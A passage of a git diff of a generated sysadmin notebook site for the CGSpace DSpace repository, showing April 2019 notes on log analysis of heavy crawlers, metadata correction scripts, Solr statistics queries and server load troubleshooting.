Services&#34;,&#34;cohorts&#34;:{&#34;sci&#34;:58,&#34;pub&#34;:239,&#34;doc&#34;:3,&#34;com&#34;:2},&#34;context&#34;:{&#34;all&#34;:{&#34;count&#34;:12732768,&#34;mean&#34;:7.8220956572788,&#34;rank&#34;:56146,&#34;pct&#34;:99,&#34;higher_than&#34;:12676701},&#34;journal&#34;:{&#34;count&#34;:549,&#34;mean&#34;:7.7567299270073,&#34;rank&#34;:2,&#34;pct&#34;:99,&#34;higher_than&#34;:547},&#34;similar_age_3m&#34;:{&#34;count&#34;:386919,&#34;mean&#34;:11.573702536454,&#34;rank&#34;:3299,&#34;pct&#34;:99,&#34;higher_than&#34;:383619},&#34;similar_age_journal_3m&#34;:{&#34;count&#34;:28,&#34;mean&#34;:9.5648148148148,&#34;rank&#34;:1,&#34;pct&#34;:96,&#34;higher_than&#34;:27}},&#34;authors&#34;:[&#34;Sylvia L.R. Wood&#34;,&#34;Sarah K. Jones&#34;,&#34;Justin A. Johnson&#34;,&#34;Kate A. Brauman&#34;,&#34;Rebecca Chaplin-Kramer&#34;,&#34;Alexander Fremier&#34;,&#34;Evan Girvetz&#34;,&#34;Line J. Gordon&#34;,&#34;Carrie V. Kappel&#34;,&#34;Lisa Mandle&#34;,&#34;Mark Mulligan&#34;,&#34;Patrick O&#39;Farrell&#34;,&#34;William K. Smith&#34;,&#34;Louise Willemen&#34;,&#34;Wei Zhang&#34;,&#34;Fabrice A. DeClerck&#34;],&#34;type&#34;:&#34;article&#34;,&#34;handles&#34;:[&#34;10568/89975&#34;,&#34;10568/89846&#34;],&#34;handle&#34;:&#34;10568/89975&#34;,&#34;altmetric_id&#34;:29816439,&#34;schema&#34;:&#34;1.5.4&#34;,&#34;is_oa&#34;:false,&#34;cited_by_posts_count&#34;:377,&#34;cited_by_tweeters_count&#34;:302,&#34;cited_by_fbwalls_count&#34;:1,&#34;cited_by_gplus_count&#34;:1,&#34;cited_by_policies_count&#34;:2,&#34;cited_by_accounts_count&#34;:306,&#34;last_updated&#34;:1554039125,&#34;score&#34;:208.65,&#34;history&#34;:{&#34;1y&#34;:54.75,&#34;6m&#34;:10.35,&#34;3m&#34;:5.5,&#34;1m&#34;:5.5,&#34;1w&#34;:1.5,&#34;6d&#34;:1.5,&#34;5d&#34;:1.5,&#34;4d&#34;:1.5,&#34;3d&#34;:1.5,&#34;2d&#34;:1,&#34;1d&#34;:1,&#34;at&#34;:208.65},&#34;url&#34;:&#34;http://dx.doi.org/10.1016/j.ecoser.2017.10.010&#34;,&#34;added_on&#34;:1512153726,&#34;published_on&#34;:1517443200,&#34;readers&#34;:{&#34;citeulike&#34;:0,&#34;mendeley&#34;:248,&#34;connotea&#34;:0},&#34;readers_count&#34;:248,&#34;images&#34;:{&#34;small&#34;:&#34;https://badges.altmetric.com/?size=64&amp;score=209&amp;types=tttttfdg&#34;,&#34;medium&#34;:&#34;https://badges.altmetric.com/?size=100&amp;score=209&amp;types=tttttfdg&#34;,&#34;large&#34;:&#34;https://badges.altmetric.com/?size=180&amp;score=209&amp;types=tttttfdg&#34;},&#34;details_url&#34;:&#34;http://www.altmetric.com/details.php?citation_id=29816439&#34;})
</code></pre><ul>
<li>Very interesting to see this in the response:</li>
</ul>
<pre><code>&quot;handles&quot;:[&quot;10568/89975&quot;,&quot;10568/89846&quot;],
&quot;handle&quot;:&quot;10568/89975&quot;
<pre tabindex="0"><code>&#34;handles&#34;:[&#34;10568/89975&#34;,&#34;10568/89846&#34;],
&#34;handle&#34;:&#34;10568/89975&#34;
</code></pre><ul>
<li>On further inspection I see that the Altmetric explorer pages for each of these Handles is actually doing the right thing:
<ul>
@ -1208,15 +1208,15 @@ sys 0m2.551s
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -34,7 +34,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
<meta property="og:type" content="article" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2019-04/" />
<meta property="article:published_time" content="2019-04-01T09:00:43+03:00" />
<meta property="article:modified_time" content="2020-04-13T15:30:24+03:00" />
<meta property="article:modified_time" content="2021-08-18T15:29:31+03:00" />
@ -64,7 +64,7 @@ $ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u ds
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 228 -f cg.coverage.country -d
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 231 -f cg.coverage.region -d
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -76,7 +76,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
"url": "https://alanorth.github.io/cgspace-notes/2019-04/",
"wordCount": "6778",
"datePublished": "2019-04-01T09:00:43+03:00",
"dateModified": "2020-04-13T15:30:24+03:00",
"dateModified": "2021-08-18T15:29:31+03:00",
"author": {
"@type": "Person",
"name": "Alan Orth"
@ -94,12 +94,12 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -145,7 +145,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
<p class="blog-post-meta">
<time datetime="2019-04-01T09:00:43+03:00">Mon Apr 01, 2019</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
</p>
@ -163,16 +163,16 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
</ul>
</li>
</ul>
<pre><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep 'Spore-192-EN-web.pdf' | grep -E '(18.196.196.108|18.195.78.144|18.195.218.6)' | awk '{print $9}' | sort | uniq -c | sort -n | tail -n 5
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#39;Spore-192-EN-web.pdf&#39; | grep -E &#39;(18.196.196.108|18.195.78.144|18.195.218.6)&#39; | awk &#39;{print $9}&#39; | sort | uniq -c | sort -n | tail -n 5
4432 200
</code></pre><ul>
<li>In the last two weeks there have been 47,000 downloads of this <em>same exact PDF</em> by these three IP addresses</li>
<li>Apply country and region corrections and deletions on DSpace Test and CGSpace:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.country -m 228 -t ACTION -d
$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -m 231 -t action -d
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p 'fuuu' -m 228 -f cg.coverage.country -d
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p 'fuuu' -m 231 -f cg.coverage.region -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.country -m 228 -t ACTION -d
$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.region -m 231 -t action -d
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 228 -f cg.coverage.country -d
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 231 -f cg.coverage.region -d
</code></pre><h2 id="2019-04-02">2019-04-02</h2>
<ul>
<li>CTA says the Amazon IPs are AWS gateways for real user traffic</li>
@ -191,26 +191,26 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
</ul>
</li>
</ul>
<pre><code>$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/bioversity.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort -u &gt; /tmp/2019-04-03-orcid-ids.txt
<pre tabindex="0"><code>$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/bioversity.txt | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort -u &gt; /tmp/2019-04-03-orcid-ids.txt
</code></pre><ul>
<li>We currently have 1177 unique ORCID identifiers, and this brings our total to 1237!</li>
<li>Next I will resolve all their names using my <code>resolve-orcids.py</code> script:</li>
</ul>
<pre><code>$ ./resolve-orcids.py -i /tmp/2019-04-03-orcid-ids.txt -o 2019-04-03-orcid-ids.txt -d
<pre tabindex="0"><code>$ ./resolve-orcids.py -i /tmp/2019-04-03-orcid-ids.txt -o 2019-04-03-orcid-ids.txt -d
</code></pre><ul>
<li>After that I added the XML formatting, formatted the file with tidy, and sorted the names in vim</li>
<li>One user&rsquo;s name has changed so I will update those using my <code>fix-metadata-values.py</code> script:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i 2019-04-03-update-orcids.csv -db dspace -u dspace -p 'fuuu' -f cg.creator.id -m 240 -t correct -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2019-04-03-update-orcids.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.creator.id -m 240 -t correct -d
</code></pre><ul>
<li>I created a pull request and merged the changes to the <code>5_x-prod</code> branch (<a href="https://github.com/ilri/DSpace/pull/417">#417</a>)</li>
<li>A few days ago I noticed some weird update process for the statistics-2018 Solr core and I see it&rsquo;s still going:</li>
</ul>
<pre><code>2019-04-03 16:34:02,262 INFO org.dspace.statistics.SolrLogger @ Updating : 1754500/21701 docs in http://localhost:8081/solr//statistics-2018
<pre tabindex="0"><code>2019-04-03 16:34:02,262 INFO org.dspace.statistics.SolrLogger @ Updating : 1754500/21701 docs in http://localhost:8081/solr//statistics-2018
</code></pre><ul>
<li>Interestingly, there are 5666 occurences, and they are mostly for the 2018 core:</li>
</ul>
<pre><code>$ grep 'org.dspace.statistics.SolrLogger @ Updating' /home/cgspace.cgiar.org/log/dspace.log.2019-04-03 | awk '{print $11}' | sort | uniq -c
<pre tabindex="0"><code>$ grep &#39;org.dspace.statistics.SolrLogger @ Updating&#39; /home/cgspace.cgiar.org/log/dspace.log.2019-04-03 | awk &#39;{print $11}&#39; | sort | uniq -c
1
3 http://localhost:8081/solr//statistics-2017
5662 http://localhost:8081/solr//statistics-2018
@ -222,14 +222,14 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
<li>Uptime Robot reported that CGSpace (linode18) went down tonight</li>
<li>I see there are lots of PostgreSQL connections:</li>
</ul>
<pre><code>$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
5 dspaceApi
10 dspaceCli
250 dspaceWeb
</code></pre><ul>
<li>I still see those weird messages about updating the statistics-2018 Solr core:</li>
</ul>
<pre><code>2019-04-05 21:06:53,770 INFO org.dspace.statistics.SolrLogger @ Updating : 2444600/21697 docs in http://localhost:8081/solr//statistics-2018
<pre tabindex="0"><code>2019-04-05 21:06:53,770 INFO org.dspace.statistics.SolrLogger @ Updating : 2444600/21697 docs in http://localhost:8081/solr//statistics-2018
</code></pre><ul>
<li>Looking at <code>iostat 1 10</code> I also see some CPU steal has come back, and I can confirm it by looking at the Munin graphs:</li>
</ul>
@ -242,7 +242,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
</ul>
</li>
</ul>
<pre><code>statistics-2017: org.apache.solr.common.SolrException:org.apache.solr.common.SolrException: Error opening new searcher
<pre tabindex="0"><code>statistics-2017: org.apache.solr.common.SolrException:org.apache.solr.common.SolrException: Error opening new searcher
</code></pre><ul>
<li>I restarted it again and all the Solr cores came up properly&hellip;</li>
</ul>
@ -257,7 +257,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
</li>
<li>Linode sent an alert that there was high CPU usage this morning on CGSpace (linode18) and these were the top IPs in the webserver access logs around the time:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;06/Apr/2019:(06|07|08|09)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;06/Apr/2019:(06|07|08|09)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
222 18.195.78.144
245 207.46.13.58
303 207.46.13.194
@ -268,7 +268,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
1803 66.249.79.59
2834 2a01:4f8:140:3192::2
9623 45.5.184.72
# zcat --force /var/log/nginx/{rest,oai}.log /var/log/nginx/{rest,oai}.log.1 | grep -E &quot;06/Apr/2019:(06|07|08|09)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/{rest,oai}.log /var/log/nginx/{rest,oai}.log.1 | grep -E &#34;06/Apr/2019:(06|07|08|09)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
31 66.249.79.62
41 207.46.13.210
42 40.77.167.66
@ -282,19 +282,19 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
</code></pre><ul>
<li><code>45.5.184.72</code> is in Colombia so it&rsquo;s probably CIAT, and I see they are indeed trying to get crawl the Discover pages on CIAT&rsquo;s datasets collection:</li>
</ul>
<pre><code>GET /handle/10568/72970/discover?filtertype_0=type&amp;filtertype_1=author&amp;filter_relational_operator_1=contains&amp;filter_relational_operator_0=equals&amp;filter_1=&amp;filter_0=Dataset&amp;filtertype=dateIssued&amp;filter_relational_operator=equals&amp;filter=2014
<pre tabindex="0"><code>GET /handle/10568/72970/discover?filtertype_0=type&amp;filtertype_1=author&amp;filter_relational_operator_1=contains&amp;filter_relational_operator_0=equals&amp;filter_1=&amp;filter_0=Dataset&amp;filtertype=dateIssued&amp;filter_relational_operator=equals&amp;filter=2014
</code></pre><ul>
<li>Their user agent is the one I added to the badbots list in nginx last week: &ldquo;GuzzleHttp/6.3.3 curl/7.47.0 PHP/7.0.30-0ubuntu0.16.04.1&rdquo;</li>
<li>They made 22,000 requests to Discover on this collection today alone (and it&rsquo;s only 11AM):</li>
</ul>
<pre><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &quot;06/Apr/2019&quot; | grep 45.5.184.72 | grep -oE '/handle/[0-9]+/[0-9]+/discover' | sort | uniq -c
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#34;06/Apr/2019&#34; | grep 45.5.184.72 | grep -oE &#39;/handle/[0-9]+/[0-9]+/discover&#39; | sort | uniq -c
22077 /handle/10568/72970/discover
</code></pre><ul>
<li>Yesterday they made 43,000 requests and we actually blocked most of them:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep &quot;05/Apr/2019&quot; | grep 45.5.184.72 | grep -oE '/handle/[0-9]+/[0-9]+/discover' | sort | uniq -c
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep &#34;05/Apr/2019&#34; | grep 45.5.184.72 | grep -oE &#39;/handle/[0-9]+/[0-9]+/discover&#39; | sort | uniq -c
43631 /handle/10568/72970/discover
# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep &quot;05/Apr/2019&quot; | grep 45.5.184.72 | grep -E '/handle/[0-9]+/[0-9]+/discover' | awk '{print $9}' | sort | uniq -c
# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep &#34;05/Apr/2019&#34; | grep 45.5.184.72 | grep -E &#39;/handle/[0-9]+/[0-9]+/discover&#39; | awk &#39;{print $9}&#39; | sort | uniq -c
142 200
43489 503
</code></pre><ul>
@ -315,59 +315,59 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
</ul>
</li>
</ul>
<pre><code>$ http --print b 'http://localhost:8081/solr/statistics/select?q=type%3A0+AND+(ip%3A18.196.196.108+OR+ip%3A18.195.78.144+OR+ip%3A18.195.218.6)&amp;fq=statistics_type%3Aview&amp;fq=bundleName%3AORIGINAL&amp;fq=dateYearMonth%3A2019-03&amp;rows=0&amp;wt=json&amp;indent=true'
<pre tabindex="0"><code>$ http --print b &#39;http://localhost:8081/solr/statistics/select?q=type%3A0+AND+(ip%3A18.196.196.108+OR+ip%3A18.195.78.144+OR+ip%3A18.195.218.6)&amp;fq=statistics_type%3Aview&amp;fq=bundleName%3AORIGINAL&amp;fq=dateYearMonth%3A2019-03&amp;rows=0&amp;wt=json&amp;indent=true&#39;
{
&quot;response&quot;: {
&quot;docs&quot;: [],
&quot;numFound&quot;: 96925,
&quot;start&quot;: 0
&#34;response&#34;: {
&#34;docs&#34;: [],
&#34;numFound&#34;: 96925,
&#34;start&#34;: 0
},
&quot;responseHeader&quot;: {
&quot;QTime&quot;: 1,
&quot;params&quot;: {
&quot;fq&quot;: [
&quot;statistics_type:view&quot;,
&quot;bundleName:ORIGINAL&quot;,
&quot;dateYearMonth:2019-03&quot;
&#34;responseHeader&#34;: {
&#34;QTime&#34;: 1,
&#34;params&#34;: {
&#34;fq&#34;: [
&#34;statistics_type:view&#34;,
&#34;bundleName:ORIGINAL&#34;,
&#34;dateYearMonth:2019-03&#34;
],
&quot;indent&quot;: &quot;true&quot;,
&quot;q&quot;: &quot;type:0 AND (ip:18.196.196.108 OR ip:18.195.78.144 OR ip:18.195.218.6)&quot;,
&quot;rows&quot;: &quot;0&quot;,
&quot;wt&quot;: &quot;json&quot;
&#34;indent&#34;: &#34;true&#34;,
&#34;q&#34;: &#34;type:0 AND (ip:18.196.196.108 OR ip:18.195.78.144 OR ip:18.195.218.6)&#34;,
&#34;rows&#34;: &#34;0&#34;,
&#34;wt&#34;: &#34;json&#34;
},
&quot;status&quot;: 0
&#34;status&#34;: 0
}
}
</code></pre><ul>
<li>Strangely I don&rsquo;t see many hits in 2019-04:</li>
</ul>
<pre><code>$ http --print b 'http://localhost:8081/solr/statistics/select?q=type%3A0+AND+(ip%3A18.196.196.108+OR+ip%3A18.195.78.144+OR+ip%3A18.195.218.6)&amp;fq=statistics_type%3Aview&amp;fq=bundleName%3AORIGINAL&amp;fq=dateYearMonth%3A2019-04&amp;rows=0&amp;wt=json&amp;indent=true'
<pre tabindex="0"><code>$ http --print b &#39;http://localhost:8081/solr/statistics/select?q=type%3A0+AND+(ip%3A18.196.196.108+OR+ip%3A18.195.78.144+OR+ip%3A18.195.218.6)&amp;fq=statistics_type%3Aview&amp;fq=bundleName%3AORIGINAL&amp;fq=dateYearMonth%3A2019-04&amp;rows=0&amp;wt=json&amp;indent=true&#39;
{
&quot;response&quot;: {
&quot;docs&quot;: [],
&quot;numFound&quot;: 38,
&quot;start&quot;: 0
&#34;response&#34;: {
&#34;docs&#34;: [],
&#34;numFound&#34;: 38,
&#34;start&#34;: 0
},
&quot;responseHeader&quot;: {
&quot;QTime&quot;: 1,
&quot;params&quot;: {
&quot;fq&quot;: [
&quot;statistics_type:view&quot;,
&quot;bundleName:ORIGINAL&quot;,
&quot;dateYearMonth:2019-04&quot;
&#34;responseHeader&#34;: {
&#34;QTime&#34;: 1,
&#34;params&#34;: {
&#34;fq&#34;: [
&#34;statistics_type:view&#34;,
&#34;bundleName:ORIGINAL&#34;,
&#34;dateYearMonth:2019-04&#34;
],
&quot;indent&quot;: &quot;true&quot;,
&quot;q&quot;: &quot;type:0 AND (ip:18.196.196.108 OR ip:18.195.78.144 OR ip:18.195.218.6)&quot;,
&quot;rows&quot;: &quot;0&quot;,
&quot;wt&quot;: &quot;json&quot;
&#34;indent&#34;: &#34;true&#34;,
&#34;q&#34;: &#34;type:0 AND (ip:18.196.196.108 OR ip:18.195.78.144 OR ip:18.195.218.6)&#34;,
&#34;rows&#34;: &#34;0&#34;,
&#34;wt&#34;: &#34;json&#34;
},
&quot;status&quot;: 0
&#34;status&#34;: 0
}
}
</code></pre><ul>
<li>Making some tests on GET vs HEAD requests on the <a href="https://dspacetest.cgiar.org/handle/10568/100289">CTA Spore 192 item</a> on DSpace Test:</li>
</ul>
<pre><code>$ http --print Hh GET https://dspacetest.cgiar.org/bitstream/handle/10568/100289/Spore-192-EN-web.pdf
<pre tabindex="0"><code>$ http --print Hh GET https://dspacetest.cgiar.org/bitstream/handle/10568/100289/Spore-192-EN-web.pdf
GET /bitstream/handle/10568/100289/Spore-192-EN-web.pdf HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
@ -419,8 +419,8 @@ X-XSS-Protection: 1; mode=block
</code></pre><ul>
<li>And from the server side, the nginx logs show:</li>
</ul>
<pre><code>78.x.x.x - - [07/Apr/2019:01:38:35 -0700] &quot;GET /bitstream/handle/10568/100289/Spore-192-EN-web.pdf HTTP/1.1&quot; 200 68078 &quot;-&quot; &quot;HTTPie/1.0.2&quot;
78.x.x.x - - [07/Apr/2019:01:39:01 -0700] &quot;HEAD /bitstream/handle/10568/100289/Spore-192-EN-web.pdf HTTP/1.1&quot; 200 0 &quot;-&quot; &quot;HTTPie/1.0.2&quot;
<pre tabindex="0"><code>78.x.x.x - - [07/Apr/2019:01:38:35 -0700] &#34;GET /bitstream/handle/10568/100289/Spore-192-EN-web.pdf HTTP/1.1&#34; 200 68078 &#34;-&#34; &#34;HTTPie/1.0.2&#34;
78.x.x.x - - [07/Apr/2019:01:39:01 -0700] &#34;HEAD /bitstream/handle/10568/100289/Spore-192-EN-web.pdf HTTP/1.1&#34; 200 0 &#34;-&#34; &#34;HTTPie/1.0.2&#34;
</code></pre><ul>
<li>So definitely the <em>size</em> of the transfer is more efficient with a HEAD, but I need to wait to see if these requests show up in Solr
<ul>
@ -428,7 +428,7 @@ X-XSS-Protection: 1; mode=block
</ul>
</li>
</ul>
<pre><code>2019-04-07 02:05:30,966 INFO org.dspace.usage.LoggerUsageEventListener @ anonymous:session_id=EF2DB6E4F69926C5555B3492BB0071A8:ip_addr=78.x.x.x:view_bitstream:bitstream_id=165818
<pre tabindex="0"><code>2019-04-07 02:05:30,966 INFO org.dspace.usage.LoggerUsageEventListener @ anonymous:session_id=EF2DB6E4F69926C5555B3492BB0071A8:ip_addr=78.x.x.x:view_bitstream:bitstream_id=165818
2019-04-07 02:05:39,265 INFO org.dspace.usage.LoggerUsageEventListener @ anonymous:session_id=B6381FC590A5160D84930102D068C7A3:ip_addr=78.x.x.x:view_bitstream:bitstream_id=165818
</code></pre><ul>
<li>So my inclination is that both HEAD and GET requests are registered as views as far as Solr and DSpace are concerned
@ -437,7 +437,7 @@ X-XSS-Protection: 1; mode=block
</ul>
</li>
</ul>
<pre><code>2019-04-07 02:08:44,186 INFO org.apache.solr.update.UpdateHandler @ start commit{,optimize=true,openSearcher=true,waitSearcher=true,expungeDeletes=false,softCommit=false,prepareCommit=false}
<pre tabindex="0"><code>2019-04-07 02:08:44,186 INFO org.apache.solr.update.UpdateHandler @ start commit{,optimize=true,openSearcher=true,waitSearcher=true,expungeDeletes=false,softCommit=false,prepareCommit=false}
</code></pre><ul>
<li>Ugh, even after optimizing there are no Solr results for requests from my IP, and actually I only see 18 results from 2019-04 so far and none of them are <code>statistics_type:view</code>&hellip; very weird
<ul>
@ -448,26 +448,26 @@ X-XSS-Protection: 1; mode=block
<li>According to the <a href="https://wiki.lyrasis.org/display/DSDOC5x/SOLR+Statistics">DSpace 5.x Solr documentation</a> the default commit time is after 15 minutes or 10,000 documents (see <code>solrconfig.xml</code>)</li>
<li>I looped some GET and HEAD requests to a bitstream on my local instance and after some time I see that they <em>do</em> register as downloads (even though they are internal):</li>
</ul>
<pre><code>$ http --print b 'http://localhost:8080/solr/statistics/select?q=type%3A0+AND+time%3A2019-04-07*&amp;fq=statistics_type%3Aview&amp;fq=isInternal%3Atrue&amp;rows=0&amp;wt=json&amp;indent=true'
<pre tabindex="0"><code>$ http --print b &#39;http://localhost:8080/solr/statistics/select?q=type%3A0+AND+time%3A2019-04-07*&amp;fq=statistics_type%3Aview&amp;fq=isInternal%3Atrue&amp;rows=0&amp;wt=json&amp;indent=true&#39;
{
&quot;response&quot;: {
&quot;docs&quot;: [],
&quot;numFound&quot;: 909,
&quot;start&quot;: 0
&#34;response&#34;: {
&#34;docs&#34;: [],
&#34;numFound&#34;: 909,
&#34;start&#34;: 0
},
&quot;responseHeader&quot;: {
&quot;QTime&quot;: 0,
&quot;params&quot;: {
&quot;fq&quot;: [
&quot;statistics_type:view&quot;,
&quot;isInternal:true&quot;
&#34;responseHeader&#34;: {
&#34;QTime&#34;: 0,
&#34;params&#34;: {
&#34;fq&#34;: [
&#34;statistics_type:view&#34;,
&#34;isInternal:true&#34;
],
&quot;indent&quot;: &quot;true&quot;,
&quot;q&quot;: &quot;type:0 AND time:2019-04-07*&quot;,
&quot;rows&quot;: &quot;0&quot;,
&quot;wt&quot;: &quot;json&quot;
&#34;indent&#34;: &#34;true&#34;,
&#34;q&#34;: &#34;type:0 AND time:2019-04-07*&#34;,
&#34;rows&#34;: &#34;0&#34;,
&#34;wt&#34;: &#34;json&#34;
},
&quot;status&quot;: 0
&#34;status&#34;: 0
}
}
</code></pre><ul>
@ -496,12 +496,12 @@ X-XSS-Protection: 1; mode=block
<li>UptimeRobot said CGSpace went down and up a few times tonight, and my first instict was to check <code>iostat 1 10</code> and I saw that CPU steal is around 1030 percent right now&hellip;</li>
<li>The load average is super high right now, as I&rsquo;ve noticed the last few times UptimeRobot said that CGSpace went down:</li>
</ul>
<pre><code>$ cat /proc/loadavg
<pre tabindex="0"><code>$ cat /proc/loadavg
10.70 9.17 8.85 18/633 4198
</code></pre><ul>
<li>According to the server logs there is actually not much going on right now:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/{access,library-access}.log /var/log/nginx/{access,library-access}.log.1 | grep -E &quot;07/Apr/2019:(18|19|20)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,library-access}.log /var/log/nginx/{access,library-access}.log.1 | grep -E &#34;07/Apr/2019:(18|19|20)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
118 18.195.78.144
128 207.46.13.219
129 167.114.64.100
@ -512,7 +512,7 @@ X-XSS-Protection: 1; mode=block
363 40.77.167.21
740 2a01:4f8:140:3192::2
4823 45.5.184.72
# zcat --force /var/log/nginx/{rest,oai}.log /var/log/nginx/{rest,oai}.log.1 | grep -E &quot;07/Apr/2019:(18|19|20)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/{rest,oai}.log /var/log/nginx/{rest,oai}.log.1 | grep -E &#34;07/Apr/2019:(18|19|20)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
3 66.249.79.62
3 66.249.83.196
4 207.46.13.86
